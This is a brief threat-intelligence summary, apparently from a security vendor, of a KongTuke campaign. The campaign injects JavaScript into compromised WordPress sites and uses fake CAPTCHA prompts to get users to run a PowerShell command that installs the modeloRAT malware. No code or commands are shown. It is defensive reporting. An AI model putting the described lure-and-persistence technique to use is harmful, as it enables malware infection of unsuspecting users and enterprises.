Our analysis of an active KongTuke campaign deploying modeloRAT—malware capable of reconnaissance, command execution, and persistent access—through compromised WordPress sites and fake CAPTCHA lures shows that the group still operates this delivery chain in parallel with the newer CrashFix technique. The attackers inject malicious JavaScript into legitimate WordPress websites, prompting users to run a PowerShell command that triggers a multistage infection process. Organizations whose users browse compromised websites or encounter prompts asking them to run commands could be at risk. The malware specifically checks whether a system is part of a corporate domain and identifies installed security tools before continuing, suggesting a focus on enterprise environments rather than opportunistic infections.
Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites
Summary: Trend Micro's Managed Detection and Response (MDR) analysis revealed that the KongTuke threat group continues to use compromised WordPress websites and fake CAPTCHA lures to deploy the modeloRAT malware.
Key facts
- KongTuke uses compromised WordPress sites and fake CAPTCHA lures to deliver the modeloRAT malware.
- The attack vector leverages legitimate system tools like PowerShell for persistence.
- Organizations with enterprise environments are at higher risk due to targeted checks by the malware.
- The group continues to use ClickFix alongside the newer CrashFix technique.
Why it matters
This technique poses significant risks to enterprises as it leverages legitimate services like PowerShell to maintain persistence without triggering alarms, making it harder for traditional security measures to detect and mitigate the threat.
@trendaisecurity
Embedded content for: Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites